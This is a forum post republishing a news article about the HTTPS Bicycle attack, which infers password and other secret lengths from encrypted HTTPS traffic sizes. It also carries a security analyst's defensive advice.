Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Share Post: Reddit Facebook
How long is your password? HTTPS Bicycle attack reveals that and more
#1
A new attack on supposedly secure communication streams raises questions over the resilience of passwords, security researchers warn.
The HTTPS Bicycle attack can result in the length of personal and secret data, such as passwords and GPS co-ordinates, being exposed from a packet capture of a user's HTTPS traffic.
The attack – discovered by security researcher Guido Vranken (and summarised below) – refocuses attention on topics such as encryption, authentication, privacy and most specifically password security.
It is usually assumed that HTTP traffic encapsulated in TLS doesn’t reveal the exact sizes of its parts, such as the length of a cookie header, or the payload of a HTTP POST request that may contain variable-length credentials such as passwords. In this paper I show that the redundancy of the plaintext HTTP headers included in each and every request can be exploited in order to reveal the length of particular components (such as passwords) of particular requests (such as authentication to a web application).
The redundancy of HTTP in practice allows for an iterative resolution of the length of ‘unknowns’ in a HTTP message until the lengths of all its components are known except for a coveted secret, such as a password, whose length is then implied. The attack furthermore exploits the property of stream-oriented cipher suites such as those based on Galois/Counter Mode that the exact size of the plaintext can be known to a man-in-the-middle.
Carl Leonard, principal security analyst at security tools firm Raytheon|Websense, commented: “End users may expect their passwords to remain secret when they interact with a website that uses encryption, but HTTPS Bicycle shows this may not be the case. Knowledge is power to an attacker, and even small pieces of information can lead to a later, more refined attack.”
Determining even the length of a password can narrow down the range of possibilities and therefore make subsequent brute force assaults more effective, continued Leonard: "The undetectable nature of this attack means it's vital that webmasters consider using strong passwords and two-factor authentication to eliminate the single point of failure. End users must ensure their passwords are sufficiently strong, while website operators and web platform developers must ensure they are fully up to date to guarantee all steps are taken to prevent this attack from occurring in the future

SOURCE
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  BIND implements DNS over HTTPS to offer enhanced privacy Bjyda 0 628 02-19-2021 , 11:04 PM
Last Post: Bjyda
  China is now blocking all encrypted HTTPS traffic that uses TLS 1.3 and ESNI mrtrout 0 1,211 08-10-2020 , 12:49 AM
Last Post: mrtrout
  Firefox turns on DNS over HTTPS by default for US users sidemoon 0 1,333 02-28-2020 , 10:18 PM
Last Post: sidemoon
  At long last, WireGuard VPN is on its way into Linux Herran 0 1,478 12-10-2019 , 05:06 PM
Last Post: Herran
  Windows will improve user privacy with DNS over HTTPS sidemoon 0 1,324 11-19-2019 , 11:32 PM
Last Post: sidemoon

Forum Jump:


Users browsing this thread: 1 Guest(s)